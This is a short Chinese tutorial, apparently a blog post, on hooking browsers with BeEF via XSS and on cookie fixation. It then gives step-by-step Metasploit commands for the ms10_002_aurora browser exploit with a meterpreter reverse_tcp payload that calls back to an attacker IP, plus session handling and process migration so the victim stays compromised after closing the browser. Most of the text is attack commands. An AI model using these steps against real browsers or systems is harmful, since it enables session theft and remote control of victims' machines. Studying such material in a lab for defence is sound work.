利用beef和msf实现session远程命令

本文介绍了如何启动BeEF(Browser Exploitation Framework)进行XSS攻击,包括修改配置文件、启动命令及Web管理界面的访问地址。同时,也展示了Metasploit Framework(MSF)的使用步骤,如启动msfconsole,选择exploit模块,设置payload,配置攻击者IP,并实现浏览器劫持和会话固定。通过这些步骤,可以理解XSS攻击的实施过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

beef

工具目录 /usr/share/beef-xss
配置文件 config.yaml

启动 beef 的方法

1.beef-xss
2./usr/share/beef-xss/beef
(使用前需要修改默认的用户名称和密码)
Web 管理界面 http://127.0.0.1:3000/ui/panel
Shellcode http://127.0.0.1:3000/hook.js
测试页面 http://127.0.0.1:3000/demos/butcher/index.html
#xss 利用 1.浏览器劫持
2.Cookie 窃取与欺骗–固定会话攻击
data:cookie=“username=admin”; userid=1


document.cookie=“username=admin”;
document.cookie=“userid=1”;


msf

1.—启动 msfcosole
2.—用模块 use exploit/windows/browser/ms10_002_aurora
3.—set payload windows/meterpreter/reverse_tcp
4.—set SRVHOST 192.168.36.128(攻击者)
5.—show options
6.—set LHOST 192.168.36.128(攻击者)
7.—启动模块 exploit 得到一个 URL,让浏览器重定向到改 URL
8.—至此建立一个 session
sessions -i 查看会话
seessions -i 1 切换会话
ps 查看当前会话
getpid 查看当前 pid
getuid 查看当前 uid
migrate 1420 切换进程到 1420(切换进程是为了使得被攻击者不会因为关闭浏览器而下线)

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值